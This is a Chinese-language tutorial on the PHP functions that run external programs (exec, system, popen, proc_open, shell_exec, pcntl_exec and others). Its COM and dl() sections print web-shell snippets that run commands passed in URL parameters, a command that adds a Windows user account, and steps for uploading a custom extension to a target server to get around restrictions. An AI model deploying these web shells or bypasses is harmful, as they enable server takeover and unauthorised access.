PHP調用外部程序的方法解析
很多情況下需要php調用其他程序如shell命令、shell腳本、可執行程序等等,此時需要使用到諸如exec/system/popen/proc_open等函數,每種函數有各自適合使用的場景以及需要註意的地方。
前提:PHP沒有運行在安全模式
如果PHP運行在安全模式下,那麼在執行外部命令、打開文件、連接數據庫、基於HTTP的認證這4個方面將會受到制約,可能在調用外部程序時無法獲取預期的結果,此時需要設置特定目錄,可以在php.ini中編輯safe_mode_exec_dir參數來指定。
1. exec
原型:string exec ( string command [, array &output [, int &return_var]] )
描述:返回值保存最後的輸出結果,而所有輸出結果將會保存到$output數組,$return_var用來保存命令執行的狀態碼(用來檢測成功或失敗)。
例子:$ret = exec(“ls -al”, $output, $var);
註意:
A. 輸出結果會逐行追加到$output中,因此在調用exec之前需要unset($output),特別是循環調用的時候。
B. 如果想通過exec調用外部程序後馬上繼續執行後續代碼,僅僅在命令裡加”&”是不夠的,此時exec依然會等待命令執行完畢;需要再將標準輸出做重定向才可以,例如:exec(“ls -al >/dev/null &”, $output, $var);
C. 要學會善用EscapeShellCmd()和EscapeShellArg()。函數EscapeShellCmd把一個字符串 中所有可能瞞過Shell而去執行另外一個命令的字符轉義。這些字符在Shell中是有特殊含義的,象分號(|),重定向(>)和從文件讀入 (<)等。函數EscapeShellArg是用來處理命令的參數的。它在給定的字符串兩邊加上單引號,並把字符串中的單引號轉義,這樣這個字符串 就可以安全地作為命令的參數。
2. system
原型:string system ( string command [, int &return_var] )
描述:執行給定的命令,返回最後的輸出結果;第二個參數是可選的,用來得到命令執行後的狀態碼。
例子:$ret = system(“ls -al”, $var);
註意:略。
3. passthru
原型:void passthru (string command [, int return_var])
描述:執行給定的命令,但不返回任何輸出結果,而是直接輸出到顯示設備上;第二個參數可選,用來得到命令執行後的狀態碼。
例子:passthru(“ls -al”, $var);
註意:略。
4. popen
原型:resource popen ( string command, string mode )
描述:打開一個指向進程的管道,該進程由派生給定的 command 命令執行而產生。 返回一個和 fopen() 所返回的相同的文件指針,隻不過它是單向的(隻能用於讀或寫)並且必須用 pclose() 來關閉。此指針可以用於 fgets(),fgetss() 和 fwrite()。
例子:$fd = popen(“command”, ‘r’); $ret = fgets($fd);
註意:隻能打開單向管道,不是’r’就是’w’;並且需要使用pclose()來關閉。
5. proc_open
原型:resource proc_open ( string cmd, array descriptorspec, array &pipes [, string cwd [, array env [, array other_options]]] )
描述:與popen類似,但是可以提供雙向管道。具體的參數讀者可以自己翻閱資料,比如該博客: http://hi.baidu.com/alex_wang58/blog/item/a28657de16fec55195ee372a.html。
註意:
A. 後面需要使用proc_close()關閉資源,並且如果是pipe類型,需要用pclose()關閉句柄。
B. proc_open打開的程序作為php的子進程,php退出後該子進程也會退出。
C. 筆者在使用的時候遇到獲取外部程序輸出阻塞的問題,也就是在例子中的fgets($pipes[1])語句阻塞瞭,無法繼續進行。經過多方查證後發現,問題一般出在外部程序中,比如外部程序是C程序,使用fprintf(stdin, “**** \n”);輸出結果,此時需要加上fflush(stdout);才行,否則輸出結果可能會暫留緩存中,無法真正輸出,而php也就無法獲取輸出瞭。
例子:
// /< 打開管道 $pwd = " ***** " ; $pipes = array (); $command = " ***** " ; $desc = array ( array ( ' pipe ' , ' r ' ) , array ( ' pipe ' , ' w ' ) , array ( ' pipe ' , ' w ' )); $handle = proc_open ( $command , $desc , $pipes , $pwd ); if ( ! is_resource ( $handle )) { fprintf (STDERR , " proc_open failed.\n " ); exit ( 1 ); } // /< 讀寫 fwrite ( $pipes [ 0 ] , " *****\n " ); $ret = rtrim ( fgets ( $pipes [ 1 ]) , " \n " ); // /< 關閉管道 fclose ( $pipes [ 0 ]); fclose ( $pipes [ 1 ]); fclose ( $pipes [ 2 ]); proc_close ( $handle );
6. shell_exec
原型:string shell_exec ( string $cmd
)
描述:cmd:要執行的命令 返回值:命令執行的輸出。 如果執行過程中發生錯誤或者進程不產生輸出,則返回 NULL。
例子:
<?php echo shell_exec('pwd'); ?>
執行結果:/var/www/html
7. 反撇號`
描述:shell_exec() 函數實際上僅是反撇號 (`) 操作符的變體
例子:
<?php echo `pwd`; ?>
執行結果:/var/www/html
8.cntl_exec
原型:void pcntl_exec ( string $path [, array $args [, array $envs ]] )
描述:(PHP 4 >= 4.2.0, PHP 5, PHP 7)
pcntl_exec — 在當前進程空間執行以給定參數執行指定程序。
pcntl是linux下的一個擴展,可以支持php的多線程操作。
參數:
path: 必須是可執行二進制文件路徑或一個在文件第一行指定瞭一個可執行文件路徑
標頭的腳本(比如文件第一行是#!/usr/local/bin/perl的perl腳本)。 更多的
信息請查看您系統的execve(2)手冊。
args: 一個要傳遞給程序的參數的字符串數組。
envs: 一個要傳遞給程序作為環境變量的字符串數組。這個數組是 key => value格
式的,key代表要傳遞的環境變量的名稱,value代表該環境變量值。
返回值:當發生錯誤時返回 FALSE ,沒有錯誤時沒有返回。
9. COM組建(針對windwos環境下使用com組建)
原型:
Wscript.Shell->exec(command) //
Shell.Application->ShellExecute(appName,appArgs,appPath) //
Shell.Application->open(appPath) //要填寫程序絕對路徑,並且應該沒有辦法加參數
Shell.Application->NameSpace(“C:\Windows\System32”)->Items()->item(“cmd.exe”)->invokeverb()
Shell.Application->NameSpace(“C:\Windows\System32”)->Items()->item(“cmd.exe”)->invokeverbEx()
描述:在windwos下,並且在php中開啟com組建擴展之後可以使用這種方法(打開方式自行百度)
徹底的解決方案是 直接刪除System32目錄下wshom.ocx文件
例子:
<?php $phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->exec("cmd.exe /c ".$_GET['c'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> <?php $phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->ShellExecute("net"," user tiny tiny /add"); //$exec=$phpwsh->ShellExecute("cmd","/c net user tiny tiny /add"); ?> <?php $phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->open("c:\\windows\\system32\\cmd.exe"); ?> <?php $a=new COM("Shell.Application"); $a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb(); ?> <?php $a=new COM("Shell.Application"); $a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx(); ?>
10. dl()
要求:php沒有開啟安全模式,並且enable_dl選項為on,並且php版本支持dl函數
(在 PHP 5.3 裡,此函數被某些 SAPI 移除瞭,也就是沒有這個函數?)
說明:extension_dir選項可以指定擴展模塊的目錄,但是我們可以使用相對路徑的方式繞過
原理:自己編寫擴展,然後使用dl加載此擴展。
舉例(linux):
準備工作:
自行上網下載apache和相近版本的php源碼,按照apache和php的官方文檔進行安裝。
我們主要需要三個文件:phpize,php-config和ext_skel:在正確安裝好瞭apache和php之後,
phpize和php-config將被安裝(可以自行find),而ext_skel則是是在php源碼中的ext目錄中。
ext_skel是php源碼包中的用來幫助制作擴展的程序。
1)轉到php-x.x.xx/ext中首先新建xxx.skel文件,裡面填寫要制作的擴展中的函數原型,例如:
string exec(string str)
2)執行命令:./ext_skel –extname=tinymin –proto=xxx.skel 之後便生成瞭tinymin目錄,
裡面則是擴展所需要的文件
3)cd tinymin
4)vi config.m4
將 config.m4文件裡面
dnl PHP_ARG_WITH(myext, for myext support,
dnl Make sure that the comment is aligned:
dnl [ –with-myext Include myext support])
修改成
PHP_ARG_WITH(myext, for myext support,
[ –with-myext Include myext support])
5)vi tinymin.c
將PHP_FUNCTION(exec)後面的大括號裡面的代碼的最後一行刪除,並寫上自己的代碼,修改後如:PHP_FUNCTION(haha)
{
char *str = NULL;
int argc = ZEND_NUM_ARGS();
int str_len;
if (zend_parse_parameters(argc TSRMLS_CC, “s”, &str, &str_len) == FAILURE)
return;
return system(str);
}
6)找到phpize:find / -name “phpize” 然後運行一下phpize:
/my_lamp/php/bin/phpize
7) 同樣方式找到php-config,然後運行configure:
./configure –with-php-config=/my_lamp/php/bin/php-config
8)make&&make install
之後便在自己的php擴展目錄中生成瞭擴展tinymin.so
在目標服務器上面上傳tinymin.so(不一定要在它的php擴展目錄中,因為可以使用相對路徑)
用法例如:
<?php
dl(“../../../../../tmp/tinymin.so”);
echo exec($_GET[‘cmd’]);
?>
這種方法也很老瞭,我在自己的的kali2上面嘗試這樣做的時候提示沒有dl這個函數,具體原因參見php manual
windows上應該也是一樣的原理。不過沒有試過
11. 內核變量
網址:http://www.freebuf.com/articles/web/82801.html
以上就是PHP調用外部程序的方法解析的詳細內容,更多關於PHP調用外部程序的方法的資料請關註WalkonNet其它相關文章!
推薦閱讀:
- None Found